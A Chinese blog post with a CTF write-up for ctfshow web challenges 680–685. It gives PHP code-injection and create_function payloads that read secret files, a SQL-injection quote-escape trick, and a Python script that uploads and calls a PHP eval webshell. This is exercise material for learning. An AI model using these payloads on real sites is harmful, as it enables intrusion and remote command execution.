ctfshow-大赛原题(680-685)

web680

post传入code=phpinfo();有回显

查看disable_functions，发现这些被禁用

assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstoped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,fopen,file_get_contents,fread,file,readfile,opendir,readdir,closedir,rewinddir

code=print_r(scandir('./'));

查看发现文件

code=show_source(secret_you_never_know);

web681

登入抓个包

尝试注入,单引号被过滤，那就用\转义单引号

输入 ||1#\ ，等价于

select count(*) from ctfshow_users where username = '||1#\' or nickname = '  ||1#\'

web682

不会解混肴

web683

?秀=7.6e6

科学计数法绕过，sleep不会转，等7秒即可（0x16进制也可绕过）

web684

/?action=\create_function&arg=return(1);}system('cat /secret_you_never_know');/*

详见web147

web685

import requests
url="http://afda2459-aa5f-4692-ad7e-6c672e51685f.challenge.ctf.show/"

files={
    'file':'<?php eval($_POST[test]);?>'+'b'*1000000
}
r=requests.post(url,files=files)
for i in range(0,10):
    u=url+'data'+str(i)+'.php'
    r=requests.post(u,data={'test':'system("ls;");'})
    print(r.text)
print(1)

posted @ 2022-04-28 04:11 Aninock 阅读(386) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· CTFSHOW-日刷-春节欢乐赛

· ctfshow-终极考核（655-663）

· ctfshow的一些wp

· 《CTFshow-Web入门》07. Web 61~70

· CTFshow命令执行

阅读排行：
· 地球OL攻略 —— 某应届生求职总结
· 周边上新：园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源！
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】

公告

昵称： Aninock
园龄： 4年5个月
粉丝： 7
关注： 4

+加关注

2025年3月

日

一

二

三

四

五

六

Loading

Aninock

ctfshow-大赛原题(680-685)

公告

搜索

常用链接

最新随笔

我的标签

积分与排名

随笔档案

阅读排行榜

评论排行榜

推荐排行榜

最新评论